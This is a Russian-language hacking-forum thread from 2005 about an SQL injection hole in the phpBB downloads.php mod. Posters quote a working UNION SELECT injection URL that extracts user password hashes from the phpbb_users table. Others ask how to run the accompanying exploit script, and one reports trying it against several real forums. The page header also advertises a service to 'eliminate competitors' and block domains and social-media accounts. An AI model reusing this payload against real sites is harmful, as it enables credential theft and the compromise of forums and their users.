FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
>
Уязвимости CMS / форумов
Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php
#
1
05.04.2005, 22:47
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
С нами:
11147366
Репутация:
901
Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php
Бедный, всеми измученный форум, и опять дыра =)
Читаем тут:
http://www.securitylab.ru/53767.html
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
SladerNon
Посмотреть профиль
Репутация
Посетить домашнюю страницу SladerNon
Найти все сообщения от SladerNon
Добавить в друзья
#
2
05.04.2005, 22:59
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами:
11282726
Репутация:
67
Угагагаааа))))) Ваще кранты =0)) Они же разорятся!
(-=util=-)
Посмотреть профиль
Репутация
Отправить личное сообщение для (-=util=-)
Найти все сообщения от (-=util=-)
Добавить в друзья
#
3
05.04.2005, 23:01
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами:
11282726
Репутация:
67
Цитата:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*
а разве модуль downloads встроен во все форумы?
Пример
C:\>phpbb.pl
www.site.com
/phpBB2/ 2
В Выполнить это вообще писать? или как. если адрес форума
www.site.com/phpBB2/index.php
И как понимать вообще знак ">"
Последний раз редактировалось (-=util=-); 05.04.2005 в
23:18
..
(-=util=-)
Посмотреть профиль
Репутация
Отправить личное сообщение для (-=util=-)
Найти все сообщения от (-=util=-)
Добавить в друзья
#
4
05.04.2005, 23:35
Mefisto
Участник форума
Регистрация: 10.10.2004
Сообщений: 101
С нами:
11359575
Репутация:
4
а как этим пользоваться?)))
Mefisto
Посмотреть профиль
Репутация
Отправить личное сообщение для Mefisto
Найти все сообщения от Mefisto
Добавить в друзья
#
5
06.04.2005, 00:20
Sn_key
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
С нами:
11145866
Репутация:
30
Блин!!! Несколько форумов перебрал все закрыты или
ужэ взломаны!!!Обьясните мож я чо не то делаю???
Цитата:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*
Вот сплойт вставляю я его в адрес но не х не получается:
ДОКУМЕНТ НЕ НАЙДЕН!!!!!!!!!!
Sn_key
Посмотреть профиль
Репутация
Отправить личное сообщение для Sn_key
Посетить домашнюю страницу Sn_key
Найти все сообщения от Sn_key
Добавить в друзья
#
6
06.04.2005, 06:05
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами:
11282726
Репутация:
67
lol. Это однас тсрочка только из сплойта =) Внимательнее читай просто
(-=util=-)
Посмотреть профиль
Репутация
Отправить личное сообщение для (-=util=-)
Найти все сообщения от (-=util=-)
Добавить в друзья
#
7
06.04.2005, 09:27
madnet
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами:
11272646
Репутация:
1384
Эта дыра только в МОДЕ downloads.php, а он почти нигде не используется.
__________________
http://madnet.name
- madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru
- Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
madnet
Посмотреть профиль
Репутация
Отправить личное сообщение для madnet
Посетить домашнюю страницу madnet
Найти все сообщения от madnet
Добавить в друзья
#
8
06.04.2005, 09:37
hacsoft
Познающий
Регистрация: 14.03.2005
Сообщений: 43
С нами:
11135481
Репутация:
2
А где можно закачать этот мод? Дайте ссылочку.
hacsoft
Посмотреть профиль
Репутация
Отправить личное сообщение для hacsoft
Посетить домашнюю страницу hacsoft
Найти все сообщения от hacsoft
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6
vega2k
Уязвимости CMS / форумов
12
11.01.2009
15:57
Новая XSS на форуме phpBB 2.0.19
NeMiNeM
Уязвимости CMS / форумов
6
26.10.2006
21:30
Уязвимость в phpBB 2.0.17
PEPSICOLA
Уязвимости CMS / форумов
13
28.09.2005
20:26
Как загрузить в папку форума, файл *.php, если я админ на форуме PhpBB 2.0.13?
dyx
Уязвимости CMS / форумов
1
05.04.2005
11:29
Как узнать пароль на форуме phpBB <=2.0.10 ?
Evgeny
Уязвимости CMS / форумов
6
26.11.2004
22:10
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.